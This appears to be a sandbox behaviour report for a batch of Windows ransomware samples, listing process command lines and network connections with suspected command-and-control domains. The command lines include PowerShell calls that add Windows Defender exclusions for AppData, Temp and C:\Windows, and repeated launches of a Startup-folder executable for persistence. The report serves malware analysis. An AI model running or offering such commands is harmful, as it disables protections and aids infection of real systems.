C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\Trojan-Ransom.Win32.Blocker.njwz-5099cc3970683923bf9ae8537dbf41ec6a27426700ec62ba7c81de7068ab35c1.exe
Trojan-Ransom.Win32.Blocker.njwz-5099cc3970683923bf9ae8537dbf41ec6a27426700ec62ba7c81de7068ab35c1.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Stop.gen-c9cf26ceba119e99260cc610f71d5a8a25333442523e85f9cc0ff3ce293e117c.exe
"C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Stop.gen-c9cf26ceba119e99260cc610f71d5a8a25333442523e85f9cc0ff3ce293e117c.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\ashcv.exe
\\.\C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\ashcv.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
C:\Users\Admin\Desktop\00484\Trojan-Ransom.Win32.Blocker.nlua-a799988bfbf38f7c9005399f089195d79b68ea64c6ed17c4552c043ad92bf426.exe
Trojan-Ransom.Win32.Blocker.nlua-a799988bfbf38f7c9005399f089195d79b68ea64c6ed17c4552c043ad92bf426.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Stop.gen-c9cf26ceba119e99260cc610f71d5a8a25333442523e85f9cc0ff3ce293e117c.exe
"C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Stop.gen-c9cf26ceba119e99260cc610f71d5a8a25333442523e85f9cc0ff3ce293e117c.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\COM7.EXE
\\.\C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\COM7.EXE
C:\Users\Admin\Desktop\00484\Trojan-Ransom.Win32.Blocker.nmtj-b6740f24c14c7ade82150dfcbe8ede8975490766ba66b19d1ccaf7e98453519f.exe
Trojan-Ransom.Win32.Blocker.nmtj-b6740f24c14c7ade82150dfcbe8ede8975490766ba66b19d1ccaf7e98453519f.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
C:\Users\Admin\Desktop\00484\Trojan-Ransom.Win32.Crusis.buz-e9e817ad892c6295459c2573c538925bcda3cc36adba56dcf33c8d5217bf0368.exe
Trojan-Ransom.Win32.Crusis.buz-e9e817ad892c6295459c2573c538925bcda3cc36adba56dcf33c8d5217bf0368.exe
C:\Users\Admin\Desktop\00484\Trojan-Ransom.Win32.Cryptodef.aoo-995063825d8bb75cfb1bf983b0685f6633a27584b1fb88a68a0cb3eba6fc0237.exe
Trojan-Ransom.Win32.Cryptodef.aoo-995063825d8bb75cfb1bf983b0685f6633a27584b1fb88a68a0cb3eba6fc0237.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
C:\Users\Admin\Desktop\00484\Trojan-Ransom.Win32.Encoder.qdm-e97be292771a327420e20b36dfd845606fb2f605a4291c10b3300365627f0814.exe
Trojan-Ransom.Win32.Encoder.qdm-e97be292771a327420e20b36dfd845606fb2f605a4291c10b3300365627f0814.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
/Processid:{0a52d887-c53b-4a50-a125-d38c5aaa675f}
C:\Users\Admin\Desktop\00484\Trojan-Ransom.Win32.Foreign.moyy-9aec597ea4451da1ad62c84772d90ab2afedaf10732aa0bdd6178d245585dcd4.exe
Trojan-Ransom.Win32.Foreign.moyy-9aec597ea4451da1ad62c84772d90ab2afedaf10732aa0bdd6178d245585dcd4.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
C:\Users\Admin\AppData\Local\Temp\Rar$EX7.src777\achsv.exe
\\.\C:\Users\Admin\AppData\Local\Temp\Rar$EX7.src777\achsv.exe
C:\Users\Admin\Desktop\00484\Trojan-Ransom.Win32.GandCrypt.fbd-043a50ede74186c54cf4f9ff6e878de32a92bcfecffe247d89011c5521da65db.exe
Trojan-Ransom.Win32.GandCrypt.fbd-043a50ede74186c54cf4f9ff6e878de32a92bcfecffe247d89011c5521da65db.exe
C:\Users\Admin\AppData\Local\Temp\Rar$EX7.src777\COM7.EXE
\\.\C:\Users\Admin\AppData\Local\Temp\Rar$EX7.src777\COM7.EXE
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
C:\Users\Admin\Desktop\00484\Trojan-Ransom.Win32.Foreign.moyy-9aec597ea4451da1ad62c84772d90ab2afedaf10732aa0bdd6178d245585dcd4.exe
Trojan-Ransom.Win32.Foreign.moyy-9aec597ea4451da1ad62c84772d90ab2afedaf10732aa0bdd6178d245585dcd4.exe
C:\Users\Admin\Desktop\00484\Trojan-Ransom.Win32.GandCrypt.jgt-be84fd2db01517037caa965618e57173f8e5560c3a83843df27e5bc7d667e689.exe
Trojan-Ransom.Win32.GandCrypt.jgt-be84fd2db01517037caa965618e57173f8e5560c3a83843df27e5bc7d667e689.exe
C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\ashcv.exe
\\.\C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\ashcv.exe
C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\COM7.EXE
\\.\C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\COM7.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
C:\Users\Admin\Desktop\00484\Trojan-Ransom.Win32.GenericCryptor.cys-f82f9d2ba863ed8c4db2d4442678c7355a015150c3bc333fde6652b1c3c930b3.exe
Trojan-Ransom.Win32.GenericCryptor.cys-f82f9d2ba863ed8c4db2d4442678c7355a015150c3bc333fde6652b1c3c930b3.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5772 -ip 5772
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5772 -s 480
C:\Users\Admin\Desktop\00484\Trojan-Ransom.Win32.GenericCryptor.czx-87784079f06ec8df763f97a83cc42b434899a7c4336104b59f88e87fc97b03d6.exe
Trojan-Ransom.Win32.GenericCryptor.czx-87784079f06ec8df763f97a83cc42b434899a7c4336104b59f88e87fc97b03d6.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
C:\Windows\SysWOW64\shell.exe
"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Admin.exe"
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
C:\Windows\SysWOW64\shell.exe
"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Admin.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
C:\Windows\SysWOW64\shell.exe
"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Admin.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
C:\Windows\SysWOW64\shell.exe
"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Admin.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
C:\Windows\SysWOW64\shell.exe
"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Admin.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
C:\Windows\SysWOW64\shell.exe
"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Admin.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
C:\Windows\SysWOW64\shell.exe
"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Admin.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
C:\Windows\SysWOW64\shell.exe
"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Admin.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
C:\Windows\SysWOW64\shell.exe
"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Admin.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
C:\Windows\SysWOW64\shell.exe
"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Admin.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
C:\Windows\SysWOW64\shell.exe
"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Admin.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.56.20.217.in-addr.arpa | udp |
| US | 128.31.0.39:9131 | 128.31.0.39 | tcp |
| US | 8.8.8.8:53 | 39.0.31.128.in-addr.arpa | udp |
| DE | 46.229.8.87:9001 | tcp | |
| US | 216.218.219.41:80 | 216.218.219.41 | tcp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.8.229.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.219.218.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | suporte01928492.redirectme.net | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| DE | 193.23.244.244:80 | 193.23.244.244 | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| DE | 193.23.244.244:80 | 193.23.244.244 | tcp |
| US | 8.8.8.8:53 | 244.244.23.193.in-addr.arpa | udp |
| NL | 45.66.35.11:80 | 45.66.35.11 | tcp |
| US | 216.218.219.41:80 | 216.218.219.41 | tcp |
| US | 8.8.8.8:53 | 11.35.66.45.in-addr.arpa | udp |
| US | 216.218.219.41:80 | 216.218.219.41 | tcp |
| DE | 193.23.244.244:80 | 193.23.244.244 | tcp |
| NL | 45.66.35.11:80 | 45.66.35.11 | tcp |
| US | 8.8.8.8:53 | api.2ip.ua | udp |
| US | 172.67.139.220:443 | api.2ip.ua | tcp |
| US | 8.8.8.8:53 | 220.139.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.179.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | topniemannpickshop.cc | udp |
| US | 8.8.8.8:53 | niemannbest.me | udp |
| US | 8.8.8.8:53 | all-mobile-pa1ments.com.mx | udp |
| US | 8.8.8.8:53 | buy-fantasy-football.com.sg | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 8.8.8.8:53 | 227.179.250.142.in-addr.arpa | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 46.3.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | speeddatingstudio.com | udp |
| PL | 45.141.215.6:110 | tcp | |
| NL | 45.66.35.11:80 | 45.66.35.11 | tcp |
| DE | 193.23.244.244:80 | 193.23.244.244 | tcp |
| US | 8.8.8.8:53 | 6.215.141.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.2ip.ua | udp |
| US | 104.21.65.24:443 | api.2ip.ua | tcp |
| US | 8.8.8.8:53 | znpst.top | udp |
| US | 8.8.8.8:53 | securebiz.org | udp |
| DE | 92.246.89.93:80 | znpst.top | tcp |
| US | 8.8.8.8:53 | 24.65.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.138.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | afmrx.ddns.net | udp |
| US | 8.8.8.8:53 | securebiz.org | udp |
| US | 8.8.8.8:53 | sanctam.net | udp |
| US | 8.8.8.8:53 | www.ibayme.eb2a.com | udp |
| US | 199.59.243.226:80 | www.ibayme.eb2a.com | tcp |
| US | 199.59.243.226:80 | www.ibayme.eb2a.com | tcp |
| US | 8.8.8.8:53 | 226.243.59.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | afmrx.ddns.net | udp |
| US | 8.8.8.8:53 | securebiz.org | udp |
| US | 8.8.8.8:53 | securebiz.org | udp |
| US | 8.8.8.8:53 | afmrx.ddns.net | udp |
| US | 199.59.243.226:80 | www.ibayme.eb2a.com | tcp |
| US | 8.8.8.8:53 | afmrx.ddns.net | udp |
| US | 8.8.8.8:53 | securebiz.org | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | afmrx.ddns.net | udp |
| GB | 213.255.226.248:28012 | tcp | |
| US | 8.8.8.8:53 | 248.226.255.213.in-addr.arpa | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | afmrx.ddns.net | udp |
| US | 8.8.8.8:53 | www.2mmotorsport.biz | udp |
| DE | 77.75.249.22:80 | www.2mmotorsport.biz | tcp |
| US | 8.8.8.8:53 | 22.249.75.77.in-addr.arpa | udp |
| DE | 77.75.249.22:443 | www.2mmotorsport.biz | tcp |
| US | 8.8.8.8:53 | afmrx.ddns.net | udp |
| US | 8.8.8.8:53 | 168.245.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | r10.o.lencr.org | udp |
| GB | 2.18.190.80:80 | r10.o.lencr.org | tcp |
| US | 8.8.8.8:53 | 80.190.18.2.in-addr.arpa | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | www.haargenau.biz | udp |
| CH | 217.26.53.161:80 | www.haargenau.biz | tcp |
| CH | 217.26.53.161:80 | www.haargenau.biz | tcp |
| US | 8.8.8.8:53 | www.bizziniinfissi.com | udp |
| US | 8.8.8.8:53 | 161.53.26.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.holzbock.biz | udp |
| CH | 94.126.20.68:80 | www.holzbock.biz | tcp |
| CH | 94.126.20.68:443 | www.holzbock.biz | tcp |
| US | 8.8.8.8:53 | afmrx.ddns.net | udp |
| US | 8.8.8.8:53 | 68.20.126.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.schreiner-freiamt.ch | udp |
| CH | 94.126.20.68:443 | www.schreiner-freiamt.ch | tcp |
| US | 8.8.8.8:53 | www.fliptray.biz | udp |
| US | 8.8.8.8:53 | www.pizcam.com | udp |
| CH | 185.177.62.27:80 | www.pizcam.com | tcp |
| CH | 185.177.62.27:443 | www.pizcam.com | tcp |
| US | 8.8.8.8:53 | 27.62.177.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| GB | 2.18.190.73:80 | r11.o.lencr.org | tcp |
| US | 8.8.8.8:53 | 73.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | afmrx.ddns.net | udp |
| US | 8.8.8.8:53 | www.swisswellness.com | udp |
| DE | 83.138.86.12:80 | www.swisswellness.com | tcp |
| DE | 83.138.86.12:80 | www.swisswellness.com | tcp |
| US | 8.8.8.8:53 | www.hotelweisshorn.com | udp |
| US | 8.8.8.8:53 | afmrx.ddns.net | udp |
| HK | 38.207.226.122:80 | www.hotelweisshorn.com | tcp |
| US | 198.12.124.71:443 | tcp | |
| US | 8.8.8.8:53 | 122.226.207.38.in-addr.arpa | udp |
| DE | 193.23.244.244:80 | 193.23.244.244 | tcp |
| HK | 38.207.226.122:80 | www.hotelweisshorn.com | tcp |
| DE | 193.23.244.244:80 | 193.23.244.244 | tcp |
| US | 8.8.8.8:53 | 71.124.12.198.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.whitepod.com | udp |
| CH | 83.166.138.7:80 | www.whitepod.com | tcp |
| CH | 83.166.138.7:443 | www.whitepod.com | tcp |
| US | 8.8.8.8:53 | 7.138.166.83.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.hardrockhoteldavos.com | udp |
| US | 18.207.88.16:80 | www.hardrockhoteldavos.com | tcp |
| US | 8.8.8.8:53 | afmrx.ddns.net | udp |
